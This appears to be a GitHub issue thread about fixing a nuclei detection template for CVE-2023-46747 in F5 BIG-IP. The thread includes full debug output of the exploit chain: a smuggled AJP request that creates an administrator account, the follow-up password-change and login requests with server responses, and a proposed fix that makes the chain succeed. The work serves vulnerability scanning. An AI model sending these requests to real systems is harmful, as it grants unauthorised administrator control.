Closed jacy1101 closed 1 year ago
ritikchaddha
commented
1 year ago Hello @0xorOne, Thank you for sharing your concern about this template. Could you please re-check if all requests in the template are working properly?
Additionally, if possible, could you share the debug data from the original template requests for further review?
jacy1101
commented
1 year ago The version of F5-BIG-IP I tested is 16.1.2.1.
jacy1101
commented
1 year ago Thank you for your reply, Users can be added, but they cannot log in successfully by sending data packets based on the original template content.
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
Content-Type: application/x-www-form-urlencoded
Content-Length: 516
Connection: close
�HTTP/1.1��/tmui/Control/form�� 127.0.0.1�� localhost�� localhost��P���
Tmui-Dubbuf��
BBBBBBBBBBB��
REMOTEROLE��0��
� localhost��admin�q_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=qlFOT&name_before=&passwd=f0BCHEH758lo&passwd_before=&finished=x&finished_before=���PATCH /mgmt/tm/auth/user/qlFOT HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic cWxGT1Q6ZjBCQ0hFSDc1OGxv
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
{"password": "bYcou6NhDVC8Zq"}POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
{"username":"qlFOT", "password":"bYcou6NhDVC8Zq"}Can you share the debug data of all the requests including the response?
jacy1101
commented
1 year ago This is using the original template to request and response.
nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.8.241 -vv -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.2
projectdiscovery.io
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.8 (latest)
[INF] New templates added in latest release: 79
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical]
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.8.241/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.8.241
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0
localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=OyDsG&name_before=&passwd=lPEgHUAYHMtX&passwd_before=&finished=x&finished_before=
0
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.8.241/tmui/login.jsp
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, no-store
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 30 Oct 2023 19:59:09 GMT
Pragma: no-cache, no-cache
Server: Apache
Set-Cookie: F5_CURRENT_PARTITION=Common; Path=/; Secure; SameSite=Strict
Set-Cookie: JSESSIONID=upWlPMJOtyjYov7CqtD6kXA1fgup5Aad; Path=/tmui; HttpOnly; SameSite=Strict
Set-Cookie: F5_CURRENT_PARTITION=Common; Path=/; Secure; SameSite=Strict
Set-Cookie: F5_CURRENT_PARTITION=Common; Path=/; Secure; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html" />
<meta http-equiv="imagetoolbar" content="false" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="-1" />
<meta charset="UTF-8"/>
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="robots" content="noindex,nofollow" />
<meta name="Copyright" content="(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved." />
<meta name="author" content="F5 Networks, Inc." />
<link rel="Shortcut Icon" type="image/x-icon" href="/tmui/tmui/skins/Default/images/favicon.ico?ver=16.1.2.1_0.0.10" />
<link rel="stylesheet" type="text/css" media="screen" href="/tmui/tmui/skins/Default/css/screen.css?ver=16.1.2.1_0.0.10" />
<link rel="stylesheet" type="text/css" media="print" href="/tmui/tmui/skins/Default/css/print.css?ver=16.1.2.1_0.0.10" />
<script type="text/javascript">
// These variables are used by the static Javascript files. They used to be dynamically inserted
// when those files were rendered by the JSP processor, but now that they're static, we need to
// set the Javascript variables somewhere. If the number of these grow too large, we may consider
// creating a "variables.jsp" Javascript file, but for now it saves an HTTP request to just shove
// them here in the shared template file.
// content.js
var advancedDisplayDefault = 'basic';
// dealer.js
var common_all_Progress = 'Progress';
var optionFilterText = 'em.device.configbrowser.NoFilterDefined'
var browserFilterMatchTxt = 'em.device.configbrowser.FilterMatch'
var browserFilterTotalTxt = 'em.device.configbrowser.Total'
var progressText="Progress"
</script>
<script type="text/javascript" src="/tmui/tmui/login/scripts/base.js?ver=16.1.2.1_0.0.10"></script>
<script type="text/javascript" src="/tmui/tmui/login/scripts/logged_in_checker.js?ver=16.1.2.1_0.0.10"></script>
<script type="text/javascript" src="/tmui/tmui/skins/Default/scripts/base.js?ver=16.1.2.1_0.0.10"></script>
<script type="text/javascript" src="/tmui/tmui/skins/Default/scripts/content.js?ver=16.1.2.1_0.0.10"></script>
<script type="text/javascript" src="/tmui/tmui/skins/Default/scripts/skin.js?ver=16.1.2.1_0.0.10"></script>
<script type="text/javascript" src="/tmui/tmui/skins/Default/scripts/util.js?ver=16.1.2.1_0.0.10"></script>
<script type="text/javascript" src="/tmui/tmui/skins/Default/scripts/dealer.js?ver=16.1.2.1_0.0.10"></script>
<script type="text/javascript" src="/tmui/tmui/skins/Default/scripts/boxover.js?ver=16.1.2.1_0.0.10"></script>
<link rel="stylesheet" type="text/css" media="screen" href="/xui/common/css/content.css?ver=16.1.2.1_0.0.10" />
<script type="text/javascript" src="/xui/common/scripts/api.js?ver=16.1.2.1_0.0.10"></script>
</head>
<body>
<script type="text/javascript">onLayoutLoad();</script>
<!-- standard_layout dot jsp [BEGIN] -->
<!-- Header -->
<!-- list dot jsp for system user -->
<!-- Preparation of PageRenderer object -->
<!-- Begin of /tmui/system/user/list.jsp? -->
<!-- End of PageRenderer -->
<script language="JavaScript" type="text/JavaScript">
<!--
helpURL = '/tmui/help/en/tmui/system/user/list.jsp'
-->
</script>
<!-- scripts from BS2. -->
<!-- standard_body_layout dot jsp [BEGIN] -->
<!-- standard_functions.inc -->
<!-- Page Menu -->
<!-- SS standard_tabs dot jsp [BEGIN] -->
<script type="text/javascript">
Xui.setMainMenu("system", "users");
</script>
<script type="text/javascript">
Xui.setPageMenu(new Xui.PageMenu([
new Xui.PageMenu.Link("User List", "/tmui/Control/jspmap/tmui/system/user/list.jsp?", "current"),
new Xui.PageMenu.Link("Partition List", "/tmui/Control/jspmap/tmui/system/partition/list.jsp?", ""),
new Xui.PageMenu.Link("Authentication", "/tmui/Control/jspmap/tmui/system/user/authproperties.jsp?", ""),
new Xui.PageMenu.Link("Remote Role Groups", "/tmui/Control/jspmap/tmui/system/remote_role/list.jsp?", "")
]));
</script>
<script type="text/javascript">
</script>
<!-- SS standard_tabs dot jsp [END] -->
<!-- End Page Menu -->
<!-- Content Divs -->
<div id="content">
<div class="glass"><img alt="" src="/tmui/tmui/skins/Default/images/transparent.gif" />
</div>
<!-- Form Warning -->
<!-- Form -->
<FORM id="myform" onSubmit=";onSubmit(this);" name="myform" enctype="application/x-www-form-urlencoded" action="/tmui/Control/form" method="post" >
<input name="_timenow" value="Mon Oct 30 12:57:54 PDT 2023" type="hidden" />
<input name="_timenow_before" value="Mon Oct 30 12:57:54 PDT 2023" type="hidden" />
<input style="position: absolute; top: 0px; background-color: transparent; border: 0px solid transparent;" name="_form_holder_opener_" value="" type="hidden" readonly="readonly" />
<input id="nosubmit" style="position: absolute; top: 0px; background-color: transparent; border: 0px solid transparent;" name="nosubmit" value=" " onclick="return false;" type="submit" readonly="readonly" />
<input name="handler" value="/tmui/system/user/list" type="hidden" />
<input name="handler_before" value="/tmui/system/user/list" type="hidden" />
<input name="showObjList" value="" type="hidden" />
<input name="showObjList_before" value="" type="hidden" />
<input name="hideObjList" value="" type="hidden" />
<input name="hideObjList_before" value="" type="hidden" />
<input name="enableObjList" value="" type="hidden" />
<input name="enableObjList_before" value="" type="hidden" />
<input name="disableObjList" value="" type="hidden" />
<input name="disableObjList_before" value="" type="hidden" />
<input name="_bufvalue" value="1R3udO81w3hhU+CnZ+eADaLxAio=" type="hidden" />
<input name="_bufvalue_before" value="1R3udO81w3hhU+CnZ+eADaLxAio=" type="hidden" />
<input name="_bufvalue_validation" value="NO_VALIDATION" type="hidden" />
<!-- Form Hiddens -->
<input name="exit_page" value="/tmui/system/user/create.jsp" type="hidden" />
<input name="exit_page_before" value="/tmui/system/user/create.jsp" type="hidden" />
<input id="form_page" name="form_page" value="/tmui/system/user/list.jsp?" type="hidden" />
<input name="form_page_before" value="/tmui/system/user/list.jsp?" type="hidden" />
<!-- Table -->
<!-- standard_list_table dot jsp [BEGIN] -->
<!-- standard_functions.inc -->
<script language="JavaScript" type="text/JavaScript">
pageType = 'list';
</script>
<div id="section_div" class="section">
<!-- List Table -->
<table class="list " border="0" cellspacing="0" cellpadding="0" id="list_table">
<!-- Column Headings -->
<thead id="list_header">
<tr class="tablehead">
<td colspan="7">
<!-- Filter -->
<!-- standard_filter dot jsp [BEGIN] -->
<div class="search">
<input onKeyPress="if (event.keyCode == 13) { search_button.click();return false}" name="search_input" value="*" class="search" type="text" />
<input name="search_input_before" value="*" type="hidden" />
<input onClick="window.location = '/tmui/Control/jspmap/tmui/system/user/list.jsp?&SearchString=' + search_input.value;return false" name="search_button" value="Search" type="button" />
<input name="search_button_before" value="Search" type="hidden" />
</div>
<div class="buttons">
<input onClick="" partition="" name="exit_button" value="Create..." type="submit" />
<input name="exit_button_before" value="Create..." type="hidden" />
</div>
<!-- standard_filter dot jsp [END] -->
</td>
</tr>
<tr class="columnhead">
<td class="first" align="center">
<!---->
<a title="Select All" onMouseOver="window.status='';return true;" class="selectall" href="javascript:selectAllCheckBoxesInParent('list_table');" >
</a>
</td>
<td class="" align="left" width="100%" >
<!-- standard_list_table_heading_engine.inc [BEGIN] -->
<!-- Begin ColumnHeading "common.all.UserName" -->
<a class="sortup" href="/tmui/Control/jspmap/tmui/system/user/list.jsp?&SortBy=name&SortDirection=desc" >
User Name</a>
<!-- End ColumnHeading "common.all.UserName" -->
<!-- standard_list_table_heading_engine.inc [END] -->
</td>
<td class="" align="left" width="" >
<!-- standard_list_table_heading_engine.inc [BEGIN] -->
<!-- Begin ColumnHeading "common.access.LockedOut" -->
<a class="sortoff" href="/tmui/Control/jspmap/tmui/system/user/list.jsp?&SortBy=locked_out&SortDirection=desc" >
Locked Out</a>
<!-- End ColumnHeading "common.access.LockedOut" -->
<!-- standard_list_table_heading_engine.inc [END] -->
</td>
<td class="" align="left" width="" >
<!-- standard_list_table_heading_engine.inc [BEGIN] -->
<!-- Begin ColumnHeading "common.access.FailedLogins" -->
<a class="sortoff" href="/tmui/Control/jspmap/tmui/system/user/list.jsp?&SortBy=login_attempts&SortDirection=desc" >
Failed Logins</a>
<!-- End ColumnHeading "common.access.FailedLogins" -->
<!-- standard_list_table_heading_engine.inc [END] -->
</td>
<td class="" align="left" width="" >
<!-- standard_list_table_heading_engine.inc [BEGIN] -->
<!-- Begin ColumnHeading "common.access.PartitionAccess" -->
<div class="null">Partition Access</div>
<!-- End ColumnHeading "common.access.PartitionAccess" -->
<!-- standard_list_table_heading_engine.inc [END] -->
</td>
<td class="" align="left" width="" >
<!-- standard_list_table_heading_engine.inc [BEGIN] -->
<!-- Begin ColumnHeading "common.access.Partition" -->
<a class="sortoff" href="/tmui/Control/jspmap/tmui/system/user/list.jsp?&SortBy=partition_id&SortDirection=desc" >
Partition</a>
<!-- End ColumnHeading "common.access.Partition" -->
<!-- standard_list_table_heading_engine.inc [END] -->
</td>
<td class="last" align="left" width="" >
<!-- standard_list_table_heading_engine.inc [BEGIN] -->
<!-- Begin ColumnHeading "common.access.Console" -->
<a class="sortoff" href="/tmui/Control/jspmap/tmui/system/user/list.jsp?&SortBy=shell&SortDirection=desc" >
Console</a>
<!-- End ColumnHeading "common.access.Console" -->
<!-- standard_list_table_heading_engine.inc [END] -->
</td>
</tr>
</thead>
<tbody id="list_body" ><tr class="color1 " style="" id='row_0'>
<td class="first" align="left" style="" >
<input id="" onClick="" partition="Common" name="checkbox0" value="0hsHF" type="checkbox" />
<input name="checkbox0_before" value="unchecked" type="hidden" />
</td>
<td class="" align="left" style="" >
<a id onClick="" title="" onMouseOver="" onMouseUp="" onMouseDown="" target="" class="" href="/tmui/Control/jspmap/tmui/system/user/properties.jsp?name=0hsHF" onMouseOut="" >
0hsHF</a>
</td>
<td class="" align="left" style="" >
No
</td>
<td class="" align="left" style="" >
0
</td>
<td class="" align="left" style="" >
<div id="">Administrator on All Partitions
<br></div>
</td>
<td class="" align="left" style="" >
Common
</td>
<td class="last" align="left" style="" >
Disabled
</td>
</tr>
<tr class="color2 " style="" id='row_1'>
<td class="first" align="left" style="" >
<input id="" onClick="" partition="Common" name="checkbox1" value="admin" type="checkbox" disabled />
<input name="checkbox1_before" value="unchecked" type="hidden" />
</td>
<td class="" align="left" style="" >
<a id onClick="" title="" onMouseOver="" onMouseUp="" onMouseDown="" target="" class="" href="/tmui/Control/jspmap/tmui/system/user/properties.jsp?name=admin" onMouseOut="" >
admin</a>
</td>
<td class="" align="left" style="" >
No
</td>
<td class="" align="left" style="" >
0
</td>
<td class="" align="left" style="" >
<div id="">Administrator on All Partitions
<br></div>
</td>
<td class="" align="left" style="" >
Common
</td>
<td class="last" align="left" style="" >
Disabled
</td>
</tr>
</tbody>
</table>
<!-- standard_list_buttons dot jsp [BEGIN] -->
<table class="tablefoot" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<div class="buttons">
<input id="list_delete" onClick="" partition="" onKeyPress="" name="delete" value="Delete..." type="submit" />
<input name="delete_before" value="Delete..." type="hidden" />
<input id="list_reset" onClick="" partition="" onKeyPress="" name="reset_button" value="Unlock" type="submit" />
<input name="reset_button_before" value="Unlock" type="hidden" />
</div>
</td>
<td>
<div class="pagecontrols">
<!-- ptable.inc [BEGIN] -->
<!-- ptable.inc [END] -->
</div>
</td>
</tr>
</table>
<!-- standard_list_buttons dot jsp [END] -->
<!-- rowCount -->
<input name="row_count" value="2" type="hidden" />
<input name="row_count_before" value="2" type="hidden" />
</div>
<!-- standard_list_table dot jsp [END] -->
</FORM>
</div>
<!-- End Content Div -->
<!-- standard_body_layout dot jsp [END] -->
<!-- Body -->
<!-- xui_message dot jsp [START] -->
<!-- xui_message dot jsp [END] -->
<!-- standard_layout dot jsp [END] -->
<script type="text/javascript">
// Call the method from the logged_in_checker.js file to do all the checking.
// Why is this at the bottom of the page? It used to be at the top, but that caused the server-side request
// to be made twice (even though only one HTTP request was being sent). Not sure why this was happening, but
// it must have had something to do with redirecting the browser away on the client side while the server
// was still rendering the response. Maybe some wacky Tomcat error handling? Not sure. In any case, moving
// the checking code down to the bottom seems to fix it. We could probably also call it during the document's
// onLoad event. This is a possible future to-do.
doUserLoggedInChecking("/tmui/Control/jspmap/tmui/system/user/list.jsp");
</script>
</body>
</html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.8.241/mgmt/tm/auth/user/OyDsG
PATCH /mgmt/tm/auth/user/OyDsG HTTP/1.1
Host: 192.168.8.241
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic T3lEc0c6bFBFZ0hVQVlITXRY
Content-Type: application/json
Accept-Encoding: gzip
{"password": "sMSR0uJJls7ey9"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.8.241/mgmt/tm/auth/user/OyDsG
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 30 Oct 2023 19:59:09 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.8.241/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.8.241
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"OyDsG", "password":"sMSR0uJJls7ey9"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.8.241/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 127
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Mon, 30 Oct 2023 19:59:11 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"Authentication failed.","referer":"192.168.8.105","restOperationId":5642568,"kind":":resterrorresponse"}
[WRN] [CVE-2023-46747] Could not make http request for https://192.168.8.241: unresolved variables found: token
[INF] No results found. Better luck next time!
AkechiShiro
commented
1 year ago What would a PR need to provide in order to fix this issue ? @0xorOne
Just this change :
"password":"{{hex_decode(password)}}"}
jacy1101
commented
1 year ago What would a PR need to provide in order to fix this issue ? @0xorOne
Just this change :
"password":"{{hex_decode(password)}}"}
I think two places need to be modified.
POST /mgmt/shared/authn/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{hex_decode(username)}}", "password":"{{hex_decode(password)}}"}- type: dsl
dsl:
- '"Username:" + hex_decode(username)'
- '"Password:" + hex_decode(password)'
- '"Token:" + token'
0xpr4bin
commented
1 year ago error on token variable, any thing i made mistake?
sky-4934
commented
1 year ago Is there a way to stop seeing this WRN fag
Nuclei Version: v3.0.2
Template file: CVE-2023-46747
Command to reproduce:
This will result in the vulnerability not being detected.
Anything else:
The password parameter of the request /mgmt/shared/authn/login path should be set to hex_decode(password).
After the change, the vulnerability can be detected.